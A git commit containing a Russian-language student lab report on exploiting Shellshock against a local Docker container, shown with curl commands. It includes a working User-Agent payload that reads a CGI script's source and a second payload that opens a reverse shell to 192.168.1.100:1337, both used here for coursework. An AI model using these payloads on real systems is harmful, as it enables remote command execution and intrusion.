refactored. 01-02-03 done

This commit is contained in:
Marat Kharitonov
2024-03-26 19:36:57 -04:00
parent 37b5fd1f40
commit 40899bcd4b
152 changed files with 647 additions and 0 deletions

View File

@@ -0,0 +1,53 @@
# Модуль 2. Сканирование на уязвимости. Сетевые сканирования
## Практическое задание №2
### Задание №1. Детектирование Shellshock с помощью Nmap
1. Скачаем [репозиторий](https://github.com/Zenithar/docker-shellshockable) и соберем Docker-контейнер
![alt text](image.png)
2. Запустим контейнер командой `docker run -d -p 80:80 --name shellshock marker689/shellshockable`
3. Посмотрим вывод CGI-скрипта.
```
curl http://localhost/cgi-bin/shockme.cgi
```
![alt text](image-1.png)
Вывод соответствует коду в CGI-скрипте:
```bash
#!/usr/local/bin/bash
echo "Content-type: text/html"
echo ""
echo "https://shellshocker.net/"
```
4. Выполним эксплуатацию уязвимости Shellshock
`curl -A "() { test;};echo \"Content-type: text/plain\"; echo; echo; /bin/cat /usr/lib/cgi-bin/shockme.cgi" http://localhost/cgi-bin/shockme.cgi`
![alt text](image-2.png)
```bash
#!/usr/local/bin/bash
echo "Content-type: text/html"
echo ""
echo "https://shellshocker.net/"
```
Мы раскрыли содержимое скрипта, также можно сделать ревер-шелл.
5. `curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'sh -i >& /dev/tcp/192.168.1.100/1337 0>&1'" http://localhost/cgi-bin/shockme.cgi`
![alt text](image-3.png)
6. Приступим к написанию
# Итог лабораторной работы
На этом лабораторная работа окончена, файл отчет в формате pdf во вложении.
Выполнил: Харитонов Марат Русланович, студенческий билет №М235314.